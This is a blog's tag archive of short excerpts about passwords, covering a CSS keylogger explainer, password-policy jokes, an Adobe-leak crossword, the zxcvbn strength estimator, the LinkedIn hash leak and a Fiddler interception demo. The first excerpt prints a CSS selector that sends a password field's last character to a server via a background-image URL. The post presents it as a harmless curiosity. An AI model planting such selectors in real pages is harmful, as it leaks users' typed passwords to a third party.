Tag Archives: password

CSS Keylogger (and why you shouldn’t worry about it)

Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory … Continue reading

Elsewhere , , , 4 Comments

Password Policy

"Your password must contain at least 8 letters, a capital, a plot, a protagonist with good character development, a twist & a happy ending." — Thomas J Carr (@OpenWithMit) October 13, 2014

Elsewhere , Leave a comment

Adobe Crossword

A crossword based on the Adobe password leak. The answers to the crossword are chosen from the 1000 most used passwords for Adobe user accounts from the recent password leak. The clues are up to 50 of the most commonly … Continue reading

Elsewhere , , , , , Leave a comment

Security Question

Your mother’s maiden name is on Ancestry.com, your high school mascot is on Classmates, your birthday is on Facebook, and so is your best friend’s name—even if it takes a few tries. — Mat Honan Yes, a repost.

Elsewhere , , Leave a comment

zxcvbn: realistic password strength estimation

Simplistic strength estimation gives bad advice. Without checking for common patterns, the practice of encouraging numbers and symbols means encouraging passwords that might only be slightly harder for a computer to crack, and yet frustratingly harder for a human to … Continue reading

Elsewhere , , , Leave a comment

Kill the Password: Why a String of Characters Can’t Protect Us Anymore

Mat Honan, who’s digital life was destroyed this summer, on passwords The age of the password has come to an end; we just haven’t realized it yet. And no one has figured out what will take its place. What we … Continue reading

Elsewhere , , , 1 Comment

Fixing the petname-as-my-password dogma.

Popular pet names Rover, Cheryl and Kate could be a thing of the past. Banks are now advising parents to think carefully before naming their child’s first pet. For security reasons, the chosen name should have at least eight characters, … Continue reading

Elsewhere , , , Leave a comment


Today, 6.5million LinkedIn password hashes leaked. These hashes are unsalted SHA-1 hashes and can be found online. If you happen to have the file lingering around, use grep “yourhash” combo_not.txt to check your hash is in it. Also check with … Continue reading

Elsewhere , , , Leave a comment

Intercepting LinkedIn Passwords

At the Microsoft TechDays 2012 in Belgium, white hat Paula Januszkiewicz shows how the tool Fiddler can be used to intercept the password of a LinkedIn user. The reason is because the password is not being encrypted by LinkedIn, although … Continue reading

Elsewhere , , , , 1 Comment